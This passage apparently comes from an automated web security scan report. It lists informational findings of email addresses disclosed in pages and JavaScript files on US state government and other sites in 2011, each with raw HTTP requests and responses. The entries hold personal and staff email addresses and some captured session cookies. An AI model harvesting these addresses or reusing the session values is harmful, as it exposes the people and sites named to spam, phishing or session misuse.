Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=69751567.1304117377.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69751567.1583628114.1304117377.1304117377.1304117377.1; __utmc=69751567; __utmb=69751567.2.10.1304117377

Response

HTTP/1.1 200 OK
Content-Length: 20483
Content-Type: text/html
Content-Location: http://www.nyfirst.ny.gov/Index.html
Last-Modified: Fri, 11 Mar 2011 22:12:37 GMT
Accept-Ranges: bytes
ETag: "d77aef6d39e0cb1:2079"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Date: Fri, 29 Apr 2011 22:50:35 GMT

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<script t
...[SNIP]...
<a href="mailto:NYfirst@empire.state.ny.us">
...[SNIP]...

22.181. http://www.nysenate.gov/files/js/js_62120c49af6ee45b927235f2cfb845ee.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nysenate.gov
Path:   /files/js/js_62120c49af6ee45b927235f2cfb845ee.js

Issue detail

The following email address was disclosed in the response:

Request

GET /files/js/js_62120c49af6ee45b927235f2cfb845ee.js HTTP/1.1
Host: www.nysenate.gov
Proxy-Connection: keep-alive
Referer: http://www.nysenate.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/x-javascript
Last-Modified: Fri, 29 Apr 2011 16:11:39 GMT
Cache-Control: s-maxage=10
Expires: Fri, 13 May 2011 22:50:30 GMT
Vary: Accept-Encoding
X-AH-Environment: prod
Date: Fri, 29 Apr 2011 22:50:30 GMT
X-Varnish: 2294176441
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 122561

// $Id: jquery.js,v 1.12.2.3 2008/06/25 09:38:39 goba Exp $

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
...[SNIP]...
<a href="http://user:pass@example.com">
...[SNIP]...

22.182. http://www.obout.com/t2/ht_howto.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.obout.com
Path:   /t2/ht_howto.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /t2/ht_howto.aspx HTTP/1.1
Host: www.obout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:39:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 162593


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_pageHead"><tit
...[SNIP]...
<6){window.setTimeout("initImageButton__OboutImageButton1(" + (attempts+1) + ")", 500);}else{alert("There was a problem referencing obout ImageButton javascript files. Please contact support@obout.com for support.");}return;}try{OboutImageButton1 = new Obout.Interface.OboutImageButton("OboutImageButton1","ctl00_Products1__flyout_product_OboutImageButton1",true,false,{"N":"/img/products/close_normal
...[SNIP]...
er.png","F":"","P":"/img/products/close_pressed.png","D":""},false);}catch(e){alert("There was an error initializing obout ImageButton with ID OboutImageButton1.\n\n" + e.message + "\n\nPlease contact support@obout.com for help.");}} initImageButton__OboutImageButton1(0); //]]>
...[SNIP]...
<6){window.setTimeout("initImageButton__OboutImageButton2(" + (attempts+1) + ")", 500);}else{alert("There was a problem referencing obout ImageButton javascript files. Please contact support@obout.com for support.");}return;}try{OboutImageButton2 = new Obout.Interface.OboutImageButton("OboutImageButton2","ctl00_Quick_links1_fbQuickLink_OboutImageButton2",true,false,{"N":"/img/products/close_normal.
...[SNIP]...
er.png","F":"","P":"/img/products/close_pressed.png","D":""},false);}catch(e){alert("There was an error initializing obout ImageButton with ID OboutImageButton2.\n\n" + e.message + "\n\nPlease contact support@obout.com for help.");}} initImageButton__OboutImageButton2(0); //]]>
...[SNIP]...

22.183. http://www.ode.state.or.us/search/results/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ode.state.or.us
Path:   /search/results/

Issue detail

The following email address was disclosed in the response:

Request

GET /search/results/ HTTP/1.1
Host: www.ode.state.or.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 194164
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 12:39:53 GMT
Connection: close

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.0 Transitional//EN'>
<html><head>

<title>ODE Topic - Oregon Department of Education</title>
<link rel='stylesheet' type='text/css' href='/includes/css/s
...[SNIP]...
<a href='mailto:ode.frontdesk@ode.state.or.us'>ode.frontdesk@ode.state.or.us</a>
...[SNIP]...

22.184. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 21:19:09 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.16
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=vg3vmlsoshfa39r3kb5kj5jrq0; expires=Mon, 23-May-2011 00:52:29 GMT; path=/; domain=.opensource.org
Last-Modified: Fri, 29 Apr 2011 21:17:31 GMT
ETag: "4bacb78b273b8f8819eb563a375e8dce"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:osi@opensource.org">
...[SNIP]...
<a href="mailto:webmaster@opensource.org">
...[SNIP]...

22.185. http://www.osbm.state.nc.us/js/helperplugin.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.osbm.state.nc.us
Path:   /js/helperplugin.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/helperplugin.js HTTP/1.1
Host: www.osbm.state.nc.us
Proxy-Connection: keep-alive
Referer: http://www.osbm.state.nc.us/ncosbm/facts_and_figures/socioeconomic_data/census_home.shtm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:39:07 GMT
Server: Apache/1.3.41 (Unix) mod_jk/1.2.27 mod_perl/1.31 mod_ssl/2.8.31 OpenSSL/0.9.7d
Last-Modified: Mon, 14 Apr 2008 18:31:34 GMT
ETag: "5b7a-1fd6-4803a306"
Accept-Ranges: bytes
Content-Length: 8150
Content-Type: application/javascript

   /* Copyright (c) 2006 Brandon Aaron (http://brandonaaron.net)
    * Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
    * and GPL (http://www.opensource.org/licenses/gpl
...[SNIP]...
that one could change
    *        the src of the iframe to whatever they need.
    *        Default: "javascript:false;"
    *
    * @name bgiframe
    * @type jQuery
    * @cat Plugins/bgiframe
    * @author Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
    */
   $.fn.bgIframe = $.fn.bgiframe = function(s) {
       // This is only for IE6
       if ( $.browser.msie && /6.0/.test(navigator.userAgent) ) {
           s = $.extend({
               top : '
...[SNIP]...

22.186. http://www.osbm.state.nc.us/ncosbm/facts_and_figures/socioeconomic_data/census_home.shtm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.osbm.state.nc.us
Path:   /ncosbm/facts_and_figures/socioeconomic_data/census_home.shtm

Issue detail

The following email address was disclosed in the response:

Request

GET /ncosbm/facts_and_figures/socioeconomic_data/census_home.shtm HTTP/1.1
Host: www.osbm.state.nc.us
Proxy-Connection: keep-alive
Referer: http://nc.gov/1222,1222,Online_Services,Online_Services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:39:03 GMT
Server: Apache/1.3.41 (Unix) mod_jk/1.2.27 mod_perl/1.31 mod_ssl/2.8.31 OpenSSL/0.9.7d
Content-Type: text/html
Content-Length: 34162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title>Census and Survey
...[SNIP]...
<a href="mailto:Webmaster-OSBM@osbm.nc.gov" title="Email" />
...[SNIP]...

22.187. https://www.paybill.com/payccu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paybill.com
Path:   /payccu/

Issue detail

The following email address was disclosed in the response:

Request

GET /payccu/ HTTP/1.1
Host: www.paybill.com
Connection: keep-alive
Referer: http://www.maryland.gov/onlineservices/Pages/onlineservices.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:54:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 5323
Content-Type: text/html
Expires: Sat, 30 Apr 2011 00:53:39 GMT
Cache-control: no-cache


<html>
<head>

<title>Maryland Department of Budget & Management</title>


   <link rel="stylesheet" type="text/css" href="../_Themes/205.css">

</head>

<body bottommargin="0" leftmargin=
...[SNIP]...
<b>askccu@dbm.state.md.us</font>
...[SNIP]...
<b>askccu@dbm.state.md.us</font>
...[SNIP]...

22.188. http://www.ri.gov/js/fontsizer.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ri.gov
Path:   /js/fontsizer.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/fontsizer.js HTTP/1.1
Host: www.ri.gov
Proxy-Connection: keep-alive
Referer: http://www.ri.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:48:07 GMT
Server: www
Last-Modified: Fri, 09 Nov 2007 16:29:17 GMT
ETag: "aea-43e817be2b140"
Accept-Ranges: bytes
Content-Length: 2794
Content-Type: application/x-javascript

/**
* Purpose: Font sizer class, handles increasing and decreasing font size of a page.
* It increases the font in 10% increments. By getting the level / 10 + 1.
*
...[SNIP]...
it(options); the two options are
* min and max, for the min level and max level.
* Defaults are min: -3 and max: 5.
*
* Author: Stefan Sedich (stefan.sedich@gmail.com
*/

$jquery = jQuery;

$jquery.FontSizer = {


options : {
       level: 0,
min: -3,
max: 5
},

Init : function(options) {

...[SNIP]...

22.189. http://www.ri.gov/js/jquery.cdc.ticker.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ri.gov
Path:   /js/jquery.cdc.ticker.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery.cdc.ticker.js HTTP/1.1
Host: www.ri.gov
Proxy-Connection: keep-alive
Referer: http://www.ri.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:48:02 GMT
Server: www
Last-Modified: Mon, 24 May 2010 13:27:24 GMT
ETag: "d04-4875700502700"
Accept-Ranges: bytes
Content-Length: 3332
Content-Type: application/x-javascript

/*
* jQuery CDC Ticker
* by Mike Auclair
* mike@mikeauclair.com
*
* Copyright (c) 2010 Mike Auclair
* Licensed under the GPL (gpl-2.0.txt) license.
*
* NOTE: This plugin depends on jQuery. Download jQuery at www.jquery.com
*
*/


/*
SCRATCH PAD


*/
(func
...[SNIP]...

22.190. http://www.ri.gov/js/jquery_cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ri.gov
Path:   /js/jquery_cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery_cookie.js HTTP/1.1
Host: www.ri.gov
Proxy-Connection: keep-alive
Referer: http://www.ri.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:48:07 GMT
Server: www
Last-Modified: Mon, 02 Apr 2007 03:24:46 GMT
ETag: "f61-42d18c34e5b80"
Accept-Ranges: bytes
Content-Length: 3937
Content-Type: application/x-javascript

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

22.191. http://www.ri.gov/plugins/mozilla_search.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ri.gov
Path:   /plugins/mozilla_search.xml

Issue detail

The following email address was disclosed in the response:

Request

GET /plugins/mozilla_search.xml HTTP/1.1
Host: www.ri.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=53040939.1304117314.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=53040939.341417921.1304117314.1304117314.1304117314.1; __utmc=53040939; __utmb=53040939.2.10.1304117314; font_level=0; switchable_style=highvis

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:48:35 GMT
Server: www
Last-Modified: Wed, 25 Oct 2006 16:49:36 GMT
ETag: "2fe-420a578d8a800"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/xml
Content-Length: 766

<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">
<ShortName>RI.gov Statewide Search</ShortName>
<Description>Search Rhode Island State Government Web Sites and Information</Des
...[SNIP]...
<Contact>rihelp@neinetwork.com</Contact>
...[SNIP]...

22.192. http://www.servicelocator.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.servicelocator.org
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.servicelocator.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 21:19:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI NID CURa ADMa DEVa TAIa PSAa PSDa OUR IND COM NAV INT CNT PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 33754
Connection: close
Via: 1.1 AN-0003011043770144


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en" lang="en">
<head
...[SNIP]...
<option value="http://smpbff2.dsd.census.gov/TheDataWeb_HotReport/servlet/HotReportEngineServlet?emailname=whazard@census.gov&amp;filename=ed_home.hrml">
...[SNIP]...
<a href="mailto:info@careeronestop.org">
...[SNIP]...

22.193. http://www.sha.maryland.gov/Index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sha.maryland.gov
Path:   /Index.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Index.aspx HTTP/1.1
Host: www.sha.maryland.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 193368
Content-Type: text/html; charset=utf-8
Expires: Fri, 15 Apr 2011 12:44:15 GMT
Last-Modified: Sat, 30 Apr 2011 12:44:15 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rqeiycuw31xd1priax01f155; path=/; HttpOnly
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6421
Date: Sat, 30 Apr 2011 12:44:14 GMT
Connection: close


<!--DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"-->
<HTML xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-
...[SNIP]...
<a href="mailto:communications@sha.state.md.us">
...[SNIP]...
<a href='mailto:communications@sha.state.md.us' target=''>
...[SNIP]...

22.194. http://www.sos.idaho.gov/elect/eleindex.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sos.idaho.gov
Path:   /elect/eleindex.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /elect/eleindex.htm HTTP/1.1
Host: www.sos.idaho.gov
Proxy-Connection: keep-alive
Referer: http://idaho.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=154226400.1304162086.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=154226400.1209179509.1304162086.1304162086.1304162086.1; __utmc=154226400; __utmb=154226400.1.10.1304162086

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Content-Length: 5683
Content-Type: text/html
Last-Modified: Thu, 14 Apr 2011 17:07:02 GMT
Accept-Ranges: bytes
ETag: "8ec6b75fc6facb1:3687"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:23:49 GMT

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<title>IDSOS Elections Index</title>
<style type="text/css
...[SNIP]...
<a href="mailto:elections@sos.idaho.gov">elections@sos.idaho.gov</a>
...[SNIP]...

22.195. http://www.sos.idaho.gov/elect/results.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sos.idaho.gov
Path:   /elect/results.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /elect/results.htm HTTP/1.1
Host: www.sos.idaho.gov
Proxy-Connection: keep-alive
Referer: http://www.sos.idaho.gov/elect/eleindex.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=154226400.1304162086.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=154226400.1209179509.1304162086.1304162086.1304162086.1; __utmc=154226400; __utmb=154226400.1.10.1304162086

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Content-Length: 30580
Content-Type: text/html
Last-Modified: Fri, 14 Jan 2011 22:01:05 GMT
Accept-Ranges: bytes
ETag: "b0e65b8a36b4cb1:3687"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:24:09 GMT

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<title>Idaho Election Results</title>
<style type="text/cs
...[SNIP]...
<a href="mailto:sosinfo@sos.idaho.gov">sosinfo@sos.idaho.gov</a>
...[SNIP]...

22.196. http://www.state.sd.us/calendar/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.sd.us
Path:   /calendar/index.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /calendar/index.cfm HTTP/1.1
Host: www.state.sd.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Redirect
Set-Cookie: ARPT=QKQJZWS164.154.226.254T0x0000000e_0xc7307f41CMYJW; expires=Mon, 30-Apr-2012 12:40:33 GMT; path=/
Content-Length: 158
Content-Type: text/html
Location: http://www.sd.gov/feedback/404.aspx
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "webmaster@state.sd.us" on "2001.06.14T11:21-0500" exp "2004.06.14T12:00-0500" r (v 0 s 0 n 0 l 0))
Date: Sat, 30 Apr 2011 12:40:33 GMT
Connection: close

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.sd.gov/feedback/404.aspx">here</a></body>

22.197. https://www.tennesseeanytime.org/apps/js/controls.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tennesseeanytime.org
Path:   /apps/js/controls.js

Issue detail

The following email address was disclosed in the response:

Request

GET /apps/js/controls.js HTTP/1.1
Host: www.tennesseeanytime.org
Connection: keep-alive
Referer: https://www.tennesseeanytime.org/biztax/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ECmL1dTx_a79PJ6J_s

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:58:58 GMT
Server: Apache
Last-Modified: Fri, 04 Jan 2008 03:07:14 GMT
Accept-Ranges: bytes
Content-Length: 34868
Connection: close
Content-Type: application/x-javascript

// script.aculo.us controls.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

22.198. https://www.tennesseeanytime.org/apps/js/dragdrop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tennesseeanytime.org
Path:   /apps/js/dragdrop.js

Issue detail

The following email address was disclosed in the response:

Request

GET /apps/js/dragdrop.js HTTP/1.1
Host: www.tennesseeanytime.org
Connection: keep-alive
Referer: https://www.tennesseeanytime.org/biztax/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ECmL1dTx_a79PJ6J_s

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:59:00 GMT
Server: Apache
Last-Modified: Fri, 04 Jan 2008 03:07:14 GMT
Accept-Ranges: bytes
Content-Length: 31605
Connection: close
Content-Type: application/x-javascript

// script.aculo.us dragdrop.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thr
...[SNIP]...

22.199. https://www.tennesseeanytime.org/apps/js/prototype.lite.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tennesseeanytime.org
Path:   /apps/js/prototype.lite.js

Issue detail

The following email address was disclosed in the response:

Request

GET /apps/js/prototype.lite.js HTTP/1.1
Host: www.tennesseeanytime.org
Connection: keep-alive
Referer: https://www.tennesseeanytime.org/paams-app/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ECmL1dTx_a79PJ6J_s

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:58:50 GMT
Server: Apache
Last-Modified: Mon, 02 Mar 2009 15:50:58 GMT
Accept-Ranges: bytes
Content-Length: 9241
Connection: close
Content-Type: application/x-javascript

/* Prototype JavaScript framework
* (c) 2005 Sam Stephenson <sam@conio.net>
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototype web
...[SNIP]...

22.200. https://www.tennesseeanytime.org/biztax/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tennesseeanytime.org
Path:   /biztax/

Issue detail

The following email address was disclosed in the response:

Request

GET /biztax/ HTTP/1.1
Host: www.tennesseeanytime.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:58:45 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
